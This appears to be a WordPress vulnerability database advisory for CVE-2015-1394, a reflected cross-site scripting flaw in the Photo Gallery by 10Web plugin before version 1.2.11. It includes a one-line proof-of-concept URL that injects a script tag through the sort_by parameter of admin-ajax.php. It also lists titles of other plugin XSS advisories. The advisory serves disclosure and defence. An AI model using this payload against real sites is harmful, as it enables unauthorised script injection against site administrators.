Photo Gallery < 1.2.11 – Multiple Authenticated Reflected XSS | CVE 2015-1394 | Plugin Vulnerabilities

Description

The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability.

Proof of Concept

/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwg_add_preview_image&sort_by=name";><script>alert(1)<%2fscript>

Affects Plugins

Fixed in 1.2.11

References

CVE

URL

https://seclists.org/bugtraq/2015/Jan/140

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

No

WPVDB ID

f58ee705-afea-467e-8284-158e0638bb49

Timeline

Publicly Published

2015-01-28 (about 11 years ago)

Added

2020-02-08 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-01-30

Title

Gosign – Posts Slider Block <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-11-11

Title

Starter Templates < 2.7.1 - Contributor+ Block Import to Stored XSS

Published

2025-05-29

Title

Minimal Share Buttons < 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Parameter

Published

2023-10-13

Title

Ultimate Taxonomy Manager <= 2.0 - Reflected XSS

Published

2024-09-12

Title

Product Slider for WooCommerce < 1.13.51 - Reflected Cross-Site Scripting